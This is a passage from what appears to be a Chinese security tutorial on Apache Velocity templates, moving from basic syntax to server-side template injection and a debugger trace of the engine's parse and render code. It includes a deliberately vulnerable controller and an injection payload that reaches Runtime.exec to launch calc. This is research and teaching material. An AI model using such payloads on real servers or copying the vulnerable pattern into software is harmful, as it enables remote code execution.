<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>Template</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>VelocityContext</span><span class=p>;</span>
<span class=n>import</span> <span class=n>java</span><span class=p>.</span><span class=n>io</span><span class=p>.</span><span class=n>StringWriter</span><span class=p>;</span>
<span class=n>public</span> <span class=n>class</span> <span class=n>IncludeExample</span> <span class=p>{</span>
<span class=n>public</span> <span class=k>static</span> <span class=kt>void</span> <span class=n>main</span><span class=p>(</span><span class=n>String</span><span class=p>[]</span> <span class=n>args</span><span class=p>)</span> <span class=p>{</span>
<span class=c1>// 初始化 Velocity 引擎</span>
<span class=n>VelocityEngine</span> <span class=n>velocityEngine</span> <span class=o>=</span> <span class=n>new</span> <span class=n>VelocityEngine</span><span class=p>();</span>
<span class=n>velocityEngine</span><span class=p>.</span><span class=n>init</span><span class=p>();</span>
<span class=c1>// 创建上下文并添加数据</span>
<span class=n>VelocityContext</span> <span class=n>context</span> <span class=o>=</span> <span class=n>new</span> <span class=n>VelocityContext</span><span class=p>();</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"name"</span><span class=p>,</span> <span class=s>"John Doe"</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"isAdmin"</span><span class=p>,</span> <span class=nb>true</span><span class=p>);</span> <span class=c1>// 或者 false,取决于用户权限</span>
<span class=c1>// 渲染主模板</span>
<span class=n>Template</span> <span class=n>template</span> <span class=o>=</span> <span class=n>velocityEngine</span><span class=p>.</span><span class=n>getTemplate</span><span class=p>(</span><span class=s>"main.vm"</span><span class=p>);</span>
<span class=n>StringWriter</span> <span class=n>writer</span> <span class=o>=</span> <span class=n>new</span> <span class=n>StringWriter</span><span class=p>();</span>
<span class=c1>// 合并上下文与模板</span>
<span class=n>template</span><span class=p>.</span><span class=n>merge</span><span class=p>(</span><span class=n>context</span><span class=p>,</span> <span class=n>writer</span><span class=p>);</span>
<span class=c1>// 输出结果</span>
<span class=n>System</span><span class=p>.</span><span class=n>out</span><span class=p>.</span><span class=n>println</span><span class=p>(</span><span class=n>writer</span><span class=p>.</span><span class=n>toString</span><span class=p>());</span>
<span class=p>}</span>
<span class=p>}</span>
</pre></div>
<p>根据给定的上下文,如果isAdmin为 true,输出将会是:</p>
<div class=highlight><pre><span></span><span class=n>Hello</span><span class=p>,</span> <span class=n>John</span> <span class=n>Doe</span><span class=o>!</span>
<span class=n>Welcome</span> <span class=n>to</span> <span class=n>the</span> <span class=n>admin</span> <span class=n>dashboard</span><span class=p>.</span>
<span class=n>You</span> <span class=n>have</span> <span class=n>access</span> <span class=n>to</span> <span class=n>all</span> <span class=n>administrative</span> <span class=n>tools</span><span class=p>.</span>
</pre></div>
<p>如果isAdmin为false,输出将会是:</p>
<div class=highlight><pre><span></span><span class=n>Hello</span><span class=p>,</span> <span class=n>John</span> <span class=n>Doe</span><span class=o>!</span>
<span class=n>Welcome</span> <span class=n>to</span> <span class=n>your</span> <span class=n>user</span> <span class=n>dashboard</span><span class=p>.</span>
<span class=n>Here</span> <span class=n>are</span> <span class=n>your</span> <span class=n>notifications</span><span class=p>...</span>
</pre></div>
<h4>数学运算</h4>
<p>Velocity也支持基本的数学运算和字符串操作</p>
<div class=highlight><pre><span></span><span class=cp>#set($total = $price * $quantity)</span>
<span class=n>The</span> <span class=n>total</span> <span class=n>cost</span> <span class=n>is</span> <span class=err>$</span><span class=n>total</span><span class=p>.</span>
<span class=cp>#set($greeting = "Hello, " + $name)</span>
<span class=err>$</span><span class=n>greeting</span>
</pre></div>
<p>示例代码:</p>
<div class=highlight><pre><span></span><span class=cp>#Java代码</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"price"</span><span class=p>,</span> <span class=mi>10</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"quantity"</span><span class=p>,</span> <span class=mi>3</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"name"</span><span class=p>,</span> <span class=s>"Al1ex"</span><span class=p>);</span>
<span class=cp>#模板内容</span>
<span class=cp>#set($total = $price * $quantity)</span>
<span class=n>The</span> <span class=n>total</span> <span class=n>cost</span> <span class=n>is</span> <span class=err>$</span><span class=n>total</span><span class=p>.</span>
<span class=cp>#set($greeting = "Hello, " + $name)</span>
<span class=err>$</span><span class=n>greeting</span>
<span class=cp>#输出内容:</span>
<span class=n>The</span> <span class=n>total</span> <span class=n>cost</span> <span class=n>is</span> <span class=mf>30.</span>
<span class=n>Hello</span><span class=p>,</span> <span class=n>Al1ex</span>
</pre></div>
<h3 id=toc-3>标识符类</h3>
<h4>'#'号标识符</h4>
<p>在Apache Velocity模板引擎中#符号用来标识各种脚本语句,允许开发者在模板中实现逻辑控制、数据处理和代码重用等功能,下面是一些常见的以#开头的Velocity指令:<br>
<strong>1、#set</strong><br>
用于设置变量的值</p>
<div class=highlight><pre><span></span><span class=cp>#set($name = "John")</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Hello</span><span class=p>,</span> <span class=n>John</span><span class=o>!</span>
</pre></div>
<p>2、#if<br>
用于条件判断</p>
<div class=highlight><pre><span></span><span class=cp>#if($age >= 18)</span>
<span class=n>You</span> <span class=n>are</span> <span class=n>an</span> <span class=n>adult</span><span class=p>.</span>
<span class=cp>#else</span>
<span class=n>You</span> <span class=n>are</span> <span class=n>a</span> <span class=n>minor</span><span class=p>.</span>
<span class=cp>#end</span>
</pre></div>
<p>3、#else<br>
'#'和if搭配使用,表示其它情况</p>
<div class=highlight><pre><span></span><span class=cp>#if($isMember)</span>
<span class=n>Welcome</span> <span class=n>back</span><span class=p>,</span> <span class=n>member</span><span class=o>!</span>
<span class=cp>#else</span>
<span class=n>Please</span> <span class=n>sign</span> <span class=n>up</span><span class=p>.</span>
<span class=cp>#end</span>
</pre></div>
<p>4、#foreach<br>
用于遍历集合(例如:数组或列表)</p>
<div class=highlight><pre><span></span><span class=cp>#foreach($item in $items)</span>
<span class=nl>Item</span><span class=p>:</span> <span class=err>$</span><span class=n>item</span>
<span class=cp>#end</span>
</pre></div>
<p>5、#include<br>
用于包含其他文件的内容</p>
<div class=highlight><pre><span></span><span class=cp>#include</span><span class=cpf>("header.vm")</span><span class=cp></span>
</pre></div>
<p>6、#parse<br>
类似于#include,但更适合解析并执行另一个模板文件</p>
<div class=highlight><pre><span></span><span class=cp>#parse("footer.vm")</span>
</pre></div>
<p>7、#macro<br>
用于定义可重用的宏</p>
<div class=highlight><pre><span></span><span class=cp>#macro(greeting $name)</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#end</span>
<span class=cp>#greeting("Alice") ## 输出:Hello, Alice!</span>
</pre></div>
<p>8、#break<br>
在循环中用于提前退出循环</p>
<div class=highlight><pre><span></span><span class=cp>#foreach($i in [1..5])</span>
<span class=cp>#if($i == 3)</span>
<span class=cp>#break</span>
<span class=cp>#end</span>
<span class=err>$</span><span class=n>i</span>
<span class=cp>#end</span>
</pre></div>
<p>9、#stop<br>
在模板的渲染过程中停止进一步的处理</p>
<div class=highlight><pre><span></span><span class=cp>#if($condition)</span>
<span class=cp>#stop</span>
<span class=cp>#end</span>
</pre></div>
<p>10、#directive<br>
用于创建自定义指令</p>
<div class=highlight><pre><span></span><span class=cp>#directive(myDirective)</span>
</pre></div>
<h4>{}标识符</h4>
<p>Velocity中的{}标识符用于变量和表达式的引用,它们提供了一种简洁的方法来插入变量值、调用方法或访问对象属性,例如:<br>
<strong>1、引用变量</strong><br>
可以使用${}来引用一个变量的值,变量通常通过#set指令定义</p>
<div class=highlight><pre><span></span><span class=cp>#set($name = "John")</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=p>{</span><span class=n>name</span><span class=p>}</span><span class=o>!</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Hello</span><span class=p>,</span> <span class=n>John</span><span class=o>!</span>
</pre></div>
<p>2、访问对象属性<br>
如果变量是一个对象,那么可以使用${}来访问该对象的属性</p>
<div class=highlight><pre><span></span><span class=cp>#set($person = {"firstName": "Jane", "lastName": "Doe"})</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=p>{</span><span class=n>person</span><span class=p>.</span><span class=n>firstName</span><span class=p>}</span> <span class=err>$</span><span class=p>{</span><span class=n>person</span><span class=p>.</span><span class=n>lastName</span><span class=p>}</span><span class=o>!</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Hello</span><span class=p>,</span> <span class=n>Jane</span> <span class=n>Doe</span><span class=o>!</span>
</pre></div>
<p>3、调用方法<br>
在${}中调用对象的方法</p>
<div class=highlight><pre><span></span><span class=cp>#set($dateTool = $tool.date)</span>
<span class=n>Today</span><span class=err>'</span><span class=n>s</span> <span class=n>date</span> <span class=nl>is</span><span class=p>:</span> <span class=err>$</span><span class=p>{</span><span class=n>dateTool</span><span class=p>.</span><span class=n>format</span><span class=p>(</span><span class=s>"yyyy-MM-dd"</span><span class=p>)}</span> <span class=err>##</span> <span class=err>输出当前日期</span>
</pre></div>
<h4>$标识符</h4>
<p>在Apache Velocity模板引擎中$符号用于表示变量的引用,通过$您可以访问在模板中定义的变量、对象属性和方法,这是Velocity的核心特性之一,使得模板能够动态地插入数据<br>
<strong>1、引用变量</strong><br>
使用$可以直接引用之前声明的变量,通常变量是通过#set指令定义的</p>
<div class=highlight><pre><span></span><span class=cp>#set($username = "Alice")</span>
<span class=n>Welcome</span><span class=p>,</span> <span class=err>$</span><span class=n>username</span><span class=o>!</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Welcome</span><span class=p>,</span> <span class=n>Alice</span><span class=o>!</span>
</pre></div>
<p>2、访问对象属性<br>
如果变量是一个对象,可以使用$来访问该对象的属性,例如:如果你有一个用户对象,你可以获取其属性</p>
<div class=highlight><pre><span></span><span class=cp>#set($user = {"name": "Bob", "age": 30})</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>user</span><span class=p>.</span><span class=n>name</span><span class=o>!</span> <span class=n>You</span> <span class=n>are</span> <span class=err>$</span><span class=n>user</span><span class=p>.</span><span class=n>age</span> <span class=n>years</span> <span class=n>old</span><span class=p>.</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Hello</span><span class=p>,</span> <span class=n>Bob</span><span class=o>!</span> <span class=n>You</span> <span class=n>are</span> <span class=mi>30</span> <span class=n>years</span> <span class=n>old</span><span class=p>.</span>
</pre></div>
<p>3、调用方法<br>
通过$来调用对象的方法以便执行某些操作或获取计算的结果</p>
<div class=highlight><pre><span></span><span class=cp>#set($dateTool = $tool.date)</span>
<span class=n>Today</span><span class=err>'</span><span class=n>s</span> <span class=n>date</span> <span class=nl>is</span><span class=p>:</span> <span class=err>$</span><span class=n>dateTool</span><span class=p>.</span><span class=n>format</span><span class=p>(</span><span class=s>"yyyy-MM-dd"</span><span class=p>)</span> <span class=err>##</span> <span class=err>输出当前日期</span>
</pre></div>
<p>4、表达式计算<br>
虽然$本身只用于变量引用,但可以与{}结合使用来实现简单的数学运算</p>
<div class=highlight><pre><span></span><span class=cp>#set($a = 5)</span>
<span class=cp>#set($b = 10)</span>
<span class=n>The</span> <span class=n>sum</span> <span class=n>of</span> <span class=err>$</span><span class=n>a</span> <span class=n>and</span> <span class=err>$</span><span class=n>b</span> <span class=n>is</span> <span class=err>$</span><span class=p>{</span><span class=n>a</span> <span class=o>+</span> <span class=n>b</span><span class=p>}.</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>The</span> <span class=n>sum</span> <span class=n>of</span> <span class=mi>5</span> <span class=n>and</span> <span class=mi>10</span> <span class=n>is</span> <span class=mf>15.</span>
</pre></div>
<h4>! 标识符</h4>
<p>在Apache Velocity模板引擎中!符号主要用于处理变量的空值(null)和默认值,它提供了一种简单的方法来确保在引用变量时,如果该变量为空则使用一个默认值,这种功能有助于避免在模板中出现空值,从而增强模板的健壮性和用户体验,当您想要引用一个变量并提供一个默认值时,可以使用${variable!"defaultValue"}的语法,其中:<br>
variable 是您希望引用的变量名<br>
defaultValue 是该变量为空时将使用的值<br>
<strong>1、基本使用</strong><br>
在这个例子中由于$name是空字符串所以输出了默认值"Guest"</p>
<div class=highlight><pre><span></span><span class=cp>#set($name = "")</span>
<span class=n>Welcome</span><span class=p>,</span> <span class=err>$</span><span class=p>{</span><span class=n>name</span><span class=o>!</span><span class=s>"Guest"</span><span class=p>}</span><span class=o>!</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Welcome</span><span class=p>,</span> <span class=n>Guest</span><span class=o>!</span>
</pre></div>
<p>2、带有实际值的变量<br>
如果变量有值那么!不会影响其输出,因为在这个例子中$name有值"Alice",所以会直接输出这个值</p>
<div class=highlight><pre><span></span><span class=cp>#set($name = "Alice")</span>
<span class=n>Welcome</span><span class=p>,</span> <span class=err>$</span><span class=p>{</span><span class=n>name</span><span class=o>!</span><span class=s>"Guest"</span><span class=p>}</span><span class=o>!</span> <span class=err>##</span> <span class=err>输出:</span><span class=n>Welcome</span><span class=p>,</span> <span class=n>Alice</span><span class=o>!</span>
</pre></div>
<h3 id=toc-4>模板注入</h3>
<h4>Velocity.evaluate</h4>
<h5>方法介绍</h5>
<p>Velocity.evaluate是Velocity引擎中的一个方法,用于处理字符串模板的评估,Velocity是一个基于Java的模板引擎,广泛应用于WEB开发和其他需要动态内容生成的场合,Velocity.evaluate方法的主要作用是将给定的模板字符串与上下文对象结合并生成最终的输出结果,这个方法通常用于在运行时动态创建内容,比如:生成HTML页面的内容或电子邮件的文本,方法如下所示:</p>
<div class=highlight><pre><span></span><span class=n>public</span> <span class=k>static</span> <span class=kt>void</span> <span class=n>evaluate</span><span class=p>(</span><span class=n>Context</span> <span class=n>context</span><span class=p>,</span> <span class=n>Writer</span> <span class=n>writer</span><span class=p>,</span> <span class=n>String</span> <span class=n>templateName</span><span class=p>,</span> <span class=n>String</span> <span class=n>template</span><span class=p>)</span>
</pre></div>
<p>参数说明:</p>
<ul>
<li>Context context:提供模板所需的数据上下文,可以包含多个键值对</li>
<li>Writer writer:输出流,用于写入生成的内容</li>
<li>String templateName:模板的名称,通常用于调试信息中</li>
<li>String template:要评估的模板字符串</li>
</ul>
<h4>示例代码</h4>
<p>简易构造如下代码所示:</p>
<div class=highlight><pre><span></span><span class=n>package</span> <span class=n>com</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>velocitytest</span><span class=p>.</span><span class=n>controller</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>app</span><span class=p>.</span><span class=n>Velocity</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>VelocityContext</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>web</span><span class=p>.</span><span class=n>bind</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=o>*</span><span class=p>;</span>
<span class=n>import</span> <span class=n>java</span><span class=p>.</span><span class=n>io</span><span class=p>.</span><span class=n>StringWriter</span><span class=p>;</span>
<span class=err>@</span><span class=n>RestController</span>
<span class=n>public</span> <span class=n>class</span> <span class=n>VelocityController</span> <span class=p>{</span>
<span class=err>@</span><span class=n>RequestMapping</span><span class=p>(</span><span class=s>"/ssti/velocity1"</span><span class=p>)</span>
<span class=err>@</span><span class=n>ResponseBody</span>
<span class=n>public</span> <span class=n>String</span> <span class=n>velocity1</span><span class=p>(</span><span class=err>@</span><span class=n>RequestParam</span><span class=p>(</span><span class=n>defaultValue</span><span class=o>=</span><span class=s>"Al1ex"</span><span class=p>)</span> <span class=n>String</span> <span class=n>username</span><span class=p>)</span> <span class=p>{</span>
<span class=n>String</span> <span class=n>templateString</span> <span class=o>=</span> <span class=s>"Hello, "</span> <span class=o>+</span> <span class=n>username</span> <span class=o>+</span> <span class=s>" | Full name: $name, phone: $phone, email: $email"</span><span class=p>;</span>
<span class=n>Velocity</span><span class=p>.</span><span class=n>init</span><span class=p>();</span>
<span class=n>VelocityContext</span> <span class=n>ctx</span> <span class=o>=</span> <span class=n>new</span> <span class=n>VelocityContext</span><span class=p>();</span>
<span class=n>ctx</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"name"</span><span class=p>,</span> <span class=s>"Al1ex Al2ex Al3ex"</span><span class=p>);</span>
<span class=n>ctx</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"phone"</span><span class=p>,</span> <span class=s>"18892936458"</span><span class=p>);</span>
<span class=n>ctx</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"email"</span><span class=p>,</span> <span class=s>"[email protected]"</span><span class=p>);</span>
<span class=n>StringWriter</span> <span class=n>out</span> <span class=o>=</span> <span class=n>new</span> <span class=n>StringWriter</span><span class=p>();</span>
<span class=n>Velocity</span><span class=p>.</span><span class=n>evaluate</span><span class=p>(</span><span class=n>ctx</span><span class=p>,</span> <span class=n>out</span><span class=p>,</span> <span class=s>"test"</span><span class=p>,</span> <span class=n>templateString</span><span class=p>);</span>
<span class=k>return</span> <span class=n>out</span><span class=p>.</span><span class=n>toString</span><span class=p>();</span>
<span class=p>}</span>
<span class=p>}</span>
</pre></div>
<h4>利用载荷</h4>
<p>通过上面的菲尼我们可以构造如下payload:</p>
<div class=highlight><pre><span></span><span class=n>username</span><span class=o>=</span><span class=err>#</span><span class=n>set</span><span class=p>(</span><span class=err>$</span><span class=n>e</span><span class=o>=</span><span class=s>"e"</span><span class=p>)</span><span class=err>$</span><span class=n>e</span><span class=p>.</span><span class=n>getClass</span><span class=p>().</span><span class=n>forName</span><span class=p>(</span><span class=s>"java.lang.Runtime"</span><span class=p>).</span><span class=n>getMethod</span><span class=p>(</span><span class=s>"getRuntime"</span><span class=p>,</span><span class=n>null</span><span class=p>).</span><span class=n>invoke</span><span class=p>(</span><span class=n>null</span><span class=p>,</span><span class=n>null</span><span class=p>).</span><span class=n>exec</span><span class=p>(</span><span class=s>"cmd.exe /c calc"</span><span class=p>)</span>
</pre></div>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101002-79f80878-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101002-79f80878-5f62-1.png></a></p>
<h4>调试分析</h4>
<p>下面我们在Velocity.evaluate功能模块处打断点进行调试分析:</p>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101035-8d2fbdb4-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101035-8d2fbdb4-5f62-1.png></a><br>
上面参数传递拼接templateString,带入Velocity.evaluate调用evaluate方法:</p>
<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101053-98493e0a-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101053-98493e0a-5f62-1.png></a><br>
随后继续向下跟进,在这调用当前类中的evaluate</p>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101108-a0ed2a1c-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101108-a0ed2a1c-5f62-1.png></a></p>
<p>随后在evaluate中先检查模板名称是否为空,不为空后调用parser进行模板解析:<br>
<a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101123-a9f3dbe2-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101123-a9f3dbe2-5f62-1.png></a></p>
<p>在这里首先检查是否已经初始化解析器,如果未初始化则进行初始化操作,随后从解析器池中获取一个Parser对象,如果池中没有可用的解析器,则将keepParser标志设为true以便找到对应的适配的解析器,紧接着调用dumpVMNamespace(templateName)方法来转储命名空间信息并使用parser.parse(reader, templateName)方法从reader中解析模板,返回的结果存储在var6中</p>
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101142-b55e2910-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101142-b55e2910-5f62-1.png></a></p>
<p>随后调用parser进行模板解析,首先初始化和状态清理,随后开始进行解析</p>
<div class=highlight><pre><span></span><span class=n>public</span> <span class=n>SimpleNode</span> <span class=nf>parse</span><span class=p>(</span><span class=n>Reader</span> <span class=n>reader</span><span class=p>,</span> <span class=n>String</span> <span class=n>templateName</span><span class=p>)</span> <span class=n>throws</span> <span class=n>ParseException</span> <span class=p>{</span>
<span class=n>SimpleNode</span> <span class=n>sn</span> <span class=o>=</span> <span class=n>null</span><span class=p>;</span>
<span class=n>this</span><span class=p>.</span><span class=n>currentTemplateName</span> <span class=o>=</span> <span class=n>templateName</span><span class=p>;</span>
<span class=n>try</span> <span class=p>{</span>
<span class=n>this</span><span class=p>.</span><span class=n>token_source</span><span class=p>.</span><span class=n>clearStateVars</span><span class=p>();</span>
<span class=n>this</span><span class=p>.</span><span class=n>velcharstream</span><span class=p>.</span><span class=n>ReInit</span><span class=p>(</span><span class=n>reader</span><span class=p>,</span> <span class=mi>1</span><span class=p>,</span> <span class=mi>1</span><span class=p>);</span>
<span class=n>this</span><span class=p>.</span><span class=n>ReInit</span><span class=p>((</span><span class=n>CharStream</span><span class=p>)</span><span class=n>this</span><span class=p>.</span><span class=n>velcharstream</span><span class=p>);</span>
<span class=n>sn</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>process</span><span class=p>();</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>MacroParseException</span> <span class=n>var6</span><span class=p>)</span> <span class=p>{</span>
<span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>.</span><span class=n>getLog</span><span class=p>().</span><span class=n>error</span><span class=p>(</span><span class=s>"Parser Error: "</span> <span class=o>+</span> <span class=n>templateName</span><span class=p>,</span> <span class=n>var6</span><span class=p>);</span>
<span class=n>throw</span> <span class=n>var6</span><span class=p>;</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>ParseException</span> <span class=n>var7</span><span class=p>)</span> <span class=p>{</span>
<span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>.</span><span class=n>getLog</span><span class=p>().</span><span class=n>error</span><span class=p>(</span><span class=s>"Parser Exception: "</span> <span class=o>+</span> <span class=n>templateName</span><span class=p>,</span> <span class=n>var7</span><span class=p>);</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>TemplateParseException</span><span class=p>(</span><span class=n>var7</span><span class=p>.</span><span class=n>currentToken</span><span class=p>,</span> <span class=n>var7</span><span class=p>.</span><span class=n>expectedTokenSequences</span><span class=p>,</span> <span class=n>var7</span><span class=p>.</span><span class=n>tokenImage</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>currentTemplateName</span><span class=p>);</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>TokenMgrError</span> <span class=n>var8</span><span class=p>)</span> <span class=p>{</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>ParseException</span><span class=p>(</span><span class=s>"Lexical error: "</span> <span class=o>+</span> <span class=n>var8</span><span class=p>.</span><span class=n>toString</span><span class=p>());</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>Exception</span> <span class=n>var9</span><span class=p>)</span> <span class=p>{</span>
<span class=n>String</span> <span class=n>msg</span> <span class=o>=</span> <span class=s>"Parser Error: "</span> <span class=o>+</span> <span class=n>templateName</span><span class=p>;</span>
<span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>.</span><span class=n>getLog</span><span class=p>().</span><span class=n>error</span><span class=p>(</span><span class=n>msg</span><span class=p>,</span> <span class=n>var9</span><span class=p>);</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>VelocityException</span><span class=p>(</span><span class=n>msg</span><span class=p>,</span> <span class=n>var9</span><span class=p>);</span>
<span class=p>}</span>
<span class=n>this</span><span class=p>.</span><span class=n>currentTemplateName</span> <span class=o>=</span> <span class=s>""</span><span class=p>;</span>
<span class=k>return</span> <span class=n>sn</span><span class=p>;</span>
<span class=p>}</span>
</pre></div>
<p><a id=img6 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101215-c8afdb9e-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101215-c8afdb9e-5f62-1.png></a></p>
<p><a id=img7 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101228-d0ca7852-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101228-d0ca7852-5f62-1.png></a></p>
<p>随后进行模板渲染操作,如果nodeTree为null,则返回false,表示评估失败,如果nodeTree不为null,则调用render方法,使用提供的上下文、写入器和日志标签来渲染模板,将render方法的结果(布尔值)作为返回值,如果渲染成功则返回 true,否则返回false</p>
<p><a id=img8 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101244-da1c0ac4-5f62-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101244-da1c0ac4-5f62-1.png></a><br>
render渲染代码如下所示:</p>
<p><a id=img9 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101415-104df45e-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101415-104df45e-5f63-1.png></a></p>
<div class=highlight><pre><span></span><span class=n>public</span> <span class=n>boolean</span> <span class=nf>render</span><span class=p>(</span><span class=n>Context</span> <span class=n>context</span><span class=p>,</span> <span class=n>Writer</span> <span class=n>writer</span><span class=p>,</span> <span class=n>String</span> <span class=n>logTag</span><span class=p>,</span> <span class=n>SimpleNode</span> <span class=n>nodeTree</span><span class=p>)</span> <span class=p>{</span>
<span class=n>InternalContextAdapterImpl</span> <span class=n>ica</span> <span class=o>=</span> <span class=n>new</span> <span class=n>InternalContextAdapterImpl</span><span class=p>(</span><span class=n>context</span><span class=p>);</span>
<span class=n>ica</span><span class=p>.</span><span class=n>pushCurrentTemplateName</span><span class=p>(</span><span class=n>logTag</span><span class=p>);</span>
<span class=n>try</span> <span class=p>{</span>
<span class=n>try</span> <span class=p>{</span>
<span class=n>nodeTree</span><span class=p>.</span><span class=n>init</span><span class=p>(</span><span class=n>ica</span><span class=p>,</span> <span class=n>this</span><span class=p>);</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>TemplateInitException</span> <span class=n>var18</span><span class=p>)</span> <span class=p>{</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>ParseErrorException</span><span class=p>(</span><span class=n>var18</span><span class=p>,</span> <span class=p>(</span><span class=n>String</span><span class=p>)</span><span class=n>null</span><span class=p>);</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>RuntimeException</span> <span class=n>var19</span><span class=p>)</span> <span class=p>{</span>
<span class=n>throw</span> <span class=n>var19</span><span class=p>;</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>Exception</span> <span class=n>var20</span><span class=p>)</span> <span class=p>{</span>
<span class=n>String</span> <span class=n>msg</span> <span class=o>=</span> <span class=s>"RuntimeInstance.render(): init exception for tag = "</span> <span class=o>+</span> <span class=n>logTag</span><span class=p>;</span>
<span class=n>this</span><span class=p>.</span><span class=n>getLog</span><span class=p>().</span><span class=n>error</span><span class=p>(</span><span class=n>msg</span><span class=p>,</span> <span class=n>var20</span><span class=p>);</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>VelocityException</span><span class=p>(</span><span class=n>msg</span><span class=p>,</span> <span class=n>var20</span><span class=p>);</span>
<span class=p>}</span>
<span class=n>try</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>provideEvaluateScope</span><span class=p>)</span> <span class=p>{</span>
<span class=n>Object</span> <span class=n>previous</span> <span class=o>=</span> <span class=n>ica</span><span class=p>.</span><span class=n>get</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>evaluateScopeName</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>evaluateScopeName</span><span class=p>,</span> <span class=n>new</span> <span class=n>Scope</span><span class=p>(</span><span class=n>this</span><span class=p>,</span> <span class=n>previous</span><span class=p>));</span>
<span class=p>}</span>
<span class=n>nodeTree</span><span class=p>.</span><span class=n>render</span><span class=p>(</span><span class=n>ica</span><span class=p>,</span> <span class=n>writer</span><span class=p>);</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>StopCommand</span> <span class=n>var21</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=n>var21</span><span class=p>.</span><span class=n>isFor</span><span class=p>(</span><span class=n>this</span><span class=p>))</span> <span class=p>{</span>
<span class=n>throw</span> <span class=n>var21</span><span class=p>;</span>
<span class=p>}</span>
